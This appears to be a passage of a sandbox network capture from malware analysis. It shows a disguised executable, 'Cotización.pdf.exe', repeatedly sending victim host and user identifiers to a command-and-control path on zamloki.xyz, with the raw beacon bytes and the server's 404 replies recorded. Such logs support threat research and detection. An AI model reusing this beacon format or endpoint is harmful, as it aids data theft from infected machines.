                                    Jul 21, 2021 17:01:58.620218039 CEST | 1334 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:58.904438019 CEST | 1335 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:58 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=47ZIMOo2ZO4vl423ar4RIA%2Bf4%2FpyreoB3WLINd6lwVvc490AQt08On30IxjTdSXUUZ8GSdub9S0wcGXHkjXmTac3qc4OLM8T9b9NBmLz6KkhH0N3DHyk4F3SeGhdMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ec1581d0629-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    18 | 192.168.2.3 | 49747 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:01:59.188102007 CEST | 1336 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:59.208123922 CEST | 1336 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:59.472018957 CEST | 1337 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:59 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TTpTsBYYJCkSdOBzPUVhIxIXv%2BSVZPCBTFinYySm11qXwermTb3crTOxpEQYPzD1IwGAGusRmqxPtkRRHMf%2FnmwF2VcVkxPu8YyozZx%2BhPrX2K6d8ejC8dsWmr27aA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ec509f10ea7-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    19 | 192.168.2.3 | 49748 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:01:59.766561031 CEST | 1338 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:59.784653902 CEST | 1338 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:00.032890081 CEST | 1339 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:00 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mp4sLaDhC0kov%2Fooz3IupxggGLBJIzvBBdRRMo9kd1Vy4TOxKOH9KJGJ312%2Fhhtq05xy0xqqZsKzE8NHGJ2IgyOC5kcFsQ5sZ%2FUfJu9ZfkBk61ikoJQ1dAlDRf3%2Faw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ec89db34eb5-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    2 | 192.168.2.3 | 49729 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:01:48.941817999 CEST | 1278 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:48.960004091 CEST | 1279 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:49.239253998 CEST | 1279 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:49 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EWGG%2BGP6oVjEsgDPPR1o%2B%2F7KQCoLSaprAnIZnr5qDS9oI3zmb6ho6ohPWN22gultOs9Bbp4mgfYnhL9g3D4Ei43zy6%2BNNrsVOXzNOjCwyVz9rm8OrIbuSeSz%2FAEWMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254e84ff084ece-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    20 | 192.168.2.3 | 49749 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:00.294747114 CEST | 1340 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:00.314498901 CEST | 1340 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:00.733241081 CEST | 1341 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:00 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GwE5bed%2BzDBqHZvf8lCo%2F%2FyImBA7ROWCyVWU3L7Jpu7o%2FMsloQDe7zSHU%2Fv%2B3rgh4iJGvG%2BGYntsXGU2eUCFz%2F0dJTDc2ucU3b8bRfO4JoFDdo5u7%2Bzll63itnO1pQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ecbec33dfcf-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    21 | 192.168.2.3 | 49750 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:01.036137104 CEST | 1342 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:01.055702925 CEST | 1342 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:01.287220955 CEST | 1343 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:01 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BsCAm%2FzfpGe1orNMKQm0mvn1rR8L2Z3Kecu%2Fz2z7Ps%2BixU%2Bx3yuV8OrVSlVNbgVU5Vgjn%2FWkztBxJjrMqH%2B07QXTTPtKKLswSamA7A%2FIqXLICzhMO7MUcLSyw355Nw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ed0885b4e2b-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    22 | 192.168.2.3 | 49751 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:01.574631929 CEST | 1343 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:01.594624996 CEST | 1344 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:01.856180906 CEST | 1344 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:01 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RWGdBTE98Ev8d7nij%2FjMEd6Vm0SEIbYvTmpeLdlEd63kPeS9YFepsFSYC9iIpCUWxf5Yo388MyBPhGwpaeJE1GT%2Fr4uzN566RgUylixXqFL4p96e9VSbkvNhc%2B8zdQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ed3ed86177a-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    23 | 192.168.2.3 | 49752 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:02.144804001 CEST | 1345 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:02.164361000 CEST | 1346 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:02.407171011 CEST | 1346 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:02 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GI%2FZ27EUIHo%2BfgUuLq%2FcylVlK60F0ASnvMeUE8HI66GIP5D0RdIieZ3R8usvJze%2BN2nz43lCX%2F%2F4cPeITzYSoDsTwCt9AJW%2FtSgNmK%2FZqfK345Au9mgADDVJCpWCyQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ed77fc04ece-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    24 | 192.168.2.3 | 49753 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:02.722496033 CEST | 1347 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:02.742388010 CEST | 1347 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:02.988822937 CEST | 1348 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:02 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OsxdqwjfVtWHtwANmu4WKnr1Tt1Iz3GzGlRtzwSb6b%2FBdbCAAFNpFHD3kGTZrHbhhqcN1oYJifN0%2FRNQ06iELAoBCdBEW4VoNRxPoGJS99EOGDMsneUdCRwafqvvYA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254edb18f94ece-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    25 | 192.168.2.3 | 49754 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:03.283216000 CEST | 1349 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:03.301315069 CEST | 1349 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:03.883820057 CEST | 1350 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:03 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xbcpUjf71ELZopu%2FW8tRGwIKINFxeT05JSguRv4z1w22y8VwfueWeDEyX3NN5hsWrP%2FJvgcFbeGLqYDOj8eY1LhfjB2SBr7rfCRsI4uQDRht6Zv1a1zK2quBBiS8Vw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ede9ed6bf19-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    26 | 192.168.2.3 | 49755 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:04.137002945 CEST | 1351 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:04.156979084 CEST | 1351 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:04.457256079 CEST | 1352 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:04 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zTOGE0LVoWL29BcvyRmpF%2FMNBp2hPoy40qpK86g9rbvsRMRnITeINehnYz3qAoeEh%2B%2BzM8pPfGQSenY%2F2XOIqKSdApt6Sy1p2lpZigTERjOuwXvBpKHwjSO8LyKIjA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ee3ee9e4e32-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    27 | 192.168.2.3 | 49756 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:04.701324940 CEST | 1353 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:04.719463110 CEST | 1353 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:04.987874985 CEST | 1354 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:04 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JuXRrhu5WUoj4CSPSVvhptVxeQxz%2ByL5i%2BOvK7kJCXplRc3KpeSkfBAhV1HIj39OPDZYOPMDhARkcXA4CnQo2KdJVXLBj3VSPjyj%2Fv6TFQYHfafdriZ54chOhsu6ew%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ee77ce34e49-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    28 | 192.168.2.3 | 49757 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:05.261212111 CEST | 1355 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:05.281430006 CEST | 1355 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:05.545480013 CEST | 1356 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:05 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QOPoVGf3BWs%2B0wz8dc4a1r9g%2B%2F66kA%2Bl%2BEXga1KYFuFqpE%2FkwboT0dmKpLp4b5K54jahzh9Q2Jr8eeF4Gna0idLCwXcY6R2867OFWUuUcZv%2FbLrLo1O6z%2B2BH5F72w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254eeaf98a97c6-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    29 | 192.168.2.3 | 49758 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:05.829794884 CEST | 1356 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:05.847943068 CEST | 1357 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
